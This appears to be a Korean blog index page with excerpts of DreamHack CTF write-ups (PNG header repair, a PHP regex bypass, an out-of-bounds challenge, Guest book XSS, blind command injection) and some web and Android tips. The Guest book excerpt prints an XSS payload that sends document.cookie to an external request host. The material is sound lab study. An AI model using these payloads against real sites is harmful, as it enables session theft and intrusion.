본문 바로가기

Tried. Failed. Logged.

728x90

분류 전체보기720

DreamHack - broken-png 풀이 image.png’s hex 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 02 00 00 00 01 00 맨 처음 89 50 4E 47 0D 0A 1A 0A 00 00 00 부분은 png의 시그니처 값을 의미한다. 그 바로 아래에 00 00 02 00 00 00 01 00는 각각 width와 height 값이 위치한다. image.png’s width property 00 00 02 00 200(16)은 512(10)이므로 이미지의 width는 512px를 의미한다. image.png’s height property 00 00 01 00 100(16)은 256(10)이므로 이미지의 height는 256px를 의미한다. 문제에서 원본은 정사각형 크기였으나.. 2023. 9. 8.

DreamHack - phpreg 풀이 첫 번째 문제 : 조건에 만족하는 name 찾기 아래 코드를 확인하면 단번에 name은 "dnyang0310"가 정답인 걸 알 수 있다. if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") 하지만 아래 preg_replace에 의해 "nyang"이 공백으로 치환된다. $name = preg_replace("/nyang/i", "", $input_name); 단어가 공백으로 치환되는 것은 아래와 같이 쉽게 우회 가능하다. dnnyangyang0310 --> dn yang0310 --> dnyang0310 두 번째 문제 : 조건에 만족하는 password 찾기 아래 조건식으로 인해 패스워드에 알파벳이 포함할 수가 없다. // pw filtering if (pr.. 2023. 9. 8.

DreamHack - out_of_boundary 풀이 out_of_boundary.c #include #include #include #include #include char name[16]; char *command[10] = { "cat", "ls", "id", "ps", "file ./oob" }; void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } int main() { int idx; initialize(); printf("Admin name: "); read(0, name.. 2023. 9. 8.

DreamHack - Guest book v0.2 풀이 먼저 페이지 하단에 작성된 태그들을 찾게 되면 문제 푸는 속도가 빨랐을 것이다. config.js의 내용은 아래와 같다. window.CONFIG = { version: "v0.2", main: "/", debug: false, debugMSG: "" } // prevent overwrite Object.freeze(window.CONFIG); 아래의 Object.freeze 메소드으로 인해 window.CONFIG가 overwriting이 안되는 상황이며 if 조건이 false로 나오면서 아래의 "localtion.href = window.CONFIG.main" 라인을 실행하지 못한다. config.js 우회 방법 쪽에 문제점이 하나 있었다. 바로 .js 자원을(config.js) 상대 경로 형태로 읽.. 2023. 9. 7.

DreamHack - Guest book 풀이 방법 1. name과 onfocus 사용 [dreamhack](#' name='foo' onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie') 위 텍스트를 URL Encoding 한다. %5Bdreamhack%5D%28%23%27%20name%3D%27foo%27%20onfocus%3D%27location%2Ehref%3D%60https%3A%2F%2Fbqfyoyg%2Erequest%2Edreamhack%2Egames%2Fcookie%3D%60%2Bdocument%2Ecookie%27%29 인코딩 된 값을 content 파라미터 값으로 건네주는데 URL 뒤에 #foo를 포함하는 것이 핵심 http:.. 2023. 9. 7.

DreamHack - CTF에 유용한 도구 모음(드림핵 툴즈) https://tools.dreamhack.games/main dreamhack-tools tools.dreamhack.games 2023. 9. 7.

DreamHack - blind-command 풀이 https://dreamhack.io/wargame/challenges/73 blind-command Read the flag file XD Reference Server-side Basic Server-side Advanced - Command Injection dreamhack.io 해결 조건 사용자로부터 GET Method를 요청받아야 함 cmd라는 GET 파라미터 값을 전달받아야 함 request.method가 GET이 아니어야 함 해결 조건 1번과 3번이 좀 모순이 된다. 코드의 7번째 라인 @app.route('/' , methods=['GET'])에 인해 GET 외에 다른 Method를 전송하면 405(METHOD NOT ALLOWED) 에러가 발생한다. 하지만 14번째 라인 if문에 의해 .. 2023. 9. 7.

자바스크립트 - 자바스크립트 난독화 사이트(obfuscator.io) 사이트 주소 https://obfuscator.io/ JavaScript Obfuscator Tool JavaScript Obfuscator Tool A free and efficient obfuscator for JavaScript (including support of ES2022). Make your code harder to copy and prevent people from stealing your work. This tool is a Web UI to the excellent (and open source) javascript-obfuscato obfuscator.io // Paste your JavaScript code here function hi() { console.log("Hello .. 2023. 9. 5.

아파치 - 구글 캡챠(reCAPTCHA) 적용하기(PHP) /etc/php/{본인 php 버전}/apache2/php.ini (curl 기능 주석 해제) extension=curl 참고: https://developers.google.com/recaptcha/docs/display?hl=ko reCAPTCHA v2 | Google for Developers 이 페이지는 Cloud Translation API를 통해 번역되었습니다. Switch to English reCAPTCHA v2 컬렉션을 사용해 정리하기 내 환경설정을 기준으로 콘텐츠를 저장하고 분류하세요. 이 페이지에서는 웹페이지에서 developers.google.com https://wonpaper.tistory.com/374 [PHP] 구글 캡차(Captcha) 달기 - V3, V2 버전 [자동입력방.. 2023. 9. 2.

안드로이드 - ADB 사용자 마지막 위치 가져오기 명령어 adb shell dumpsys location > dumpsys.txt 편집기에서 Ctrl + F(페이지 찾기) > "last location=Location[network " 검색 > 마지막 위치(위도, 경도) 추출 출처: https://android.stackexchange.com/questions/85279/a-way-to-get-location-coordinates-from-command-line A way to get location coordinates from command line I'm looking for a command line, or a series of commands that can dump or list the latitude and longitude on a roo.. 2023. 9. 1.

Jekyll - 깃허브 페이지 Jekyll ---layout: home # Index page--- 에러 해결 방법 .github/workflows/pages-deploy.yml ruby-version: 3.1 ruby-version을 3에서 3.1로 변경하고 branches를 master로 수정하니 해결이 된 것 같다. 또 안되면 3.1에서 3으로 수정하니깐 제대로 작동이 된다(?????????????) 출처: https://velog.io/@hashnsalt/Github-Blog-%EB%A7%8C%EB%93%A4%EA%B8%B0-2 📒Github Blog 만들기-2 22/08/01 7월 31일자 겪은 수 많은 오류가 서막이었음을 그땐 깨닫지 못했습니다 내 목표는 github로 기술 블로그를 개설하는 것. 선택한 테마는 Chirpy theme. velog.io 2023. 8. 31.

CSS - 인기 있는 디자인 프레임워크(Tailwind CSS) https://tailwindcss.com/ Tailwind CSS - Rapidly build modern websites without ever leaving your HTML. Tailwind CSS is a utility-first CSS framework for rapidly building modern websites without ever leaving your HTML. tailwindcss.com https://flowbite.com/ https://flowbite.com/ flowbite.com 2023. 8. 28.

이전 1 ··· 8 9 10 11 12 13 14 ··· 60 다음

728x90

티스토리툴바